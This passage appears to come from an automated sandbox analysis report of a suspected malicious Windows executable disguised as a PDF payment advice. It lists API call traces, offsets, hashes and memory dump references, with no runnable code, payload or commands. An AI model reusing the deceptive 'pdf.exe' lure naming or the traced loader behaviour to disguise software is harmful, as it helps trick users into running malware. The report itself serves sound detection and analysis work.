                                                                                                                • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761449716-0
                                                                                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                  • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                • CloseClipboard.USER32 ref: 00405676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: {
                                                                                                                • API String ID: 590372296-366298937
                                                                                                                • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                  • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                  • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                  • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                  • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                  • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                • API String ID: 2624150263-3131679198
                                                                                                                • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4227406936-0
                                                                                                                • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                • GetSysColor.USER32(?), ref: 00404396
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                • String ID: -B@$Call$N$open
                                                                                                                • API String ID: 3615053054-1446803726
                                                                                                                • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                APIs
                                                                                                                • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                • wsprintfA.USER32 ref: 00405DFB
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
